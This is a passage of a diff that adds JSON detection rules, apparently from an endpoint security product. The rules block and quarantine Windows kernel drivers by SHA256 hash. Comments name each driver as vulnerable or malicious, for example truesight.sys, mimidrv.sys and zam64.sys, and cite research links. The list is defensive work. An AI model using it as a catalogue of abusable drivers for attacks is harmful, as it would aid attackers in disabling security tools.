+ "creation_date": "2026-03-23T11:45:31.146955Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e020d0095c96b3bb246b7884b0c7700b62a8cadb18b8de44cc0e4852e74596e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "363af1b8-6f28-5465-87dd-44e21b7620bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978668Z",
+ "creation_date": "2026-03-23T11:45:29.978670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1718a005232d1261894b798a60c73d971416359b70d0e545d7e7a40ed742b71",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "363c9e90-3af4-5b54-8ab6-4b8e3345f218",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480431Z",
+ "creation_date": "2026-03-23T11:45:30.480433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6023b8fd2ce4ad2f3005a53aa160772e43fe58da8e467bd05ab71f3335fb822",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3644289b-1d3d-5609-8a48-0e20053b969c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826938Z",
+ "creation_date": "2026-03-23T11:45:30.826940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826952Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e8d345e25502abe87f46b78f31b290c202855e50fb302e765298b21e6868ec0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36567fad-de9b-53b6-8d2c-9bc0b9883e68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148001Z",
+ "creation_date": "2026-03-23T11:45:31.148003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ca5f440d25b04318b450b527a9696a040d9801b88461ac4aa7e133799add08b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3657d8e3-a9f8-5207-bdba-da0d32887f6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495547Z",
+ "creation_date": "2026-03-23T11:45:31.495549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2eb35a8ca7ce6149d6dc9380bb0883ea4a5822abc94c1e64780590534c4a4a5f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "365a1850-b4c9-534c-9fc6-c003e10b3af9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157612Z",
+ "creation_date": "2026-03-23T11:45:31.157615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "693ff41be1f95fb1f55f4ab3ef610a4b0bdfda21b992e00fcbd76aab8634ad69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "365c12b6-39eb-5073-bddb-6762cc990a54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467648Z",
+ "creation_date": "2026-03-23T11:45:30.467651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e0133cfe93c0e1cdd995b8668134bafcd35976c8f02400112668d91da7eb34a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3667d275-1bbb-506a-bce3-d09de825f969",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810326Z",
+ "creation_date": "2026-03-23T11:45:31.810328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62507931949cdad75b4d46bc2a7997514a5f618a532958d2a1c31d5a6870ecf8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "366873f6-6c59-5ac2-bd5e-ce5a125421d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479367Z",
+ "creation_date": "2026-03-23T11:45:31.479371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e90c7a07cf0d7bbc73d334a912ea1d4e079658daf2a2a081776004764d25fa7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36720b49-0576-5349-a2ed-5e9df03a30fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824438Z",
+ "creation_date": "2026-03-23T11:45:30.824440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e47d93196bb62140f65d8e860b93fd4a9b280f8a559487b5349356d1d301c69b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36759e85-e912-53a4-bbc1-abcd17371ea6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971420Z",
+ "creation_date": "2026-03-23T11:45:29.971423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971432Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7e091e0d478c34232e8479b950c5513077b3a69309885cee4c61063e5f74ac0",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "367dc82b-21c3-5e4e-b24f-1bbd038cbf06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605862Z",
+ "creation_date": "2026-03-23T11:45:29.605864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "075de997497262a9d105afeadaaefc6348b25ce0e0126505c24aa9396c251e85",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "367e7cb4-9b85-5854-9490-a53bb940b951",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481888Z",
+ "creation_date": "2026-03-23T11:45:31.481893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ad5fba2066e4e72925c362a751f591965523b1727d79c6c21505cf82d049bd7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "368c2920-b654-547d-8baa-157aee9e2d51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972457Z",
+ "creation_date": "2026-03-23T11:45:29.972459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4182c6f1f9c5601b66dfe8f64d4e4e943eeeb3345ad4b5e23e3ad3b328af7eed",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3690d9fc-699a-52ae-b0e6-054ac8af5088",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154709Z",
+ "creation_date": "2026-03-23T11:45:31.154710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2eb541f77203a949a851d733f019ed837e7a88c38c5aacbc227ff6f7c5d1af62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "369359be-bb2c-5213-bffe-707b1d620087",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616312Z",
+ "creation_date": "2026-03-23T11:45:29.616314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26ba58c9af9c8a7aebf222f491f786daa0626be44d34f170fea3623d92828e63",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3693ae0e-5b61-5e3f-8f86-c8411d84a5c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144484Z",
+ "creation_date": "2026-03-23T11:45:32.144486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144492Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdd16a94a71644a8bb52c4e0fbfecb93f04cfe37bd91bac599cf9abfb822762f",
+ "comment": "Malicious Kernel Driver (aka driver_fdd16a94.sys) [https://www.loldrivers.io/drivers/da066835-f37c-40bf-86bb-d77ad45c7f30/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3695d524-a409-597d-b98d-54ab7a6eb1a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490315Z",
+ "creation_date": "2026-03-23T11:45:31.490317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c21a832cbda14a54ff07a81d486ce37eacd3a8d041000d22fb0d929cdbef591",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "369b4b39-a9be-5a72-899a-9c634525f92b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142167Z",
+ "creation_date": "2026-03-23T11:45:31.142169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b418e2604e8cf433ce9e6b80096ca64aa009393938ecec46d9482b18b2a5929a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36a92de4-93aa-5ffa-9123-fb41f95f089c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478859Z",
+ "creation_date": "2026-03-23T11:45:30.478863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bea8c6728d57d4b075f372ac82b8134ac8044fe13f533696a58e8864fa3efee3",
+ "comment": "Vulnerable Kernel Driver (aka rtcoremini64.sys) [https://www.loldrivers.io/drivers/b9e01a11-6395-4837-a202-0c777d717a43/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36bc48e4-23ad-5c24-8c02-b6c60a233afa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150941Z",
+ "creation_date": "2026-03-23T11:45:31.150943Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18ea074a9f9f960b7a4c2229212d2ada88fd617078fd976bd6c2d7c93b21c9db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36ce12e8-ea2a-5534-9a87-b0a775767179",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825012Z",
+ "creation_date": "2026-03-23T11:45:30.825016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
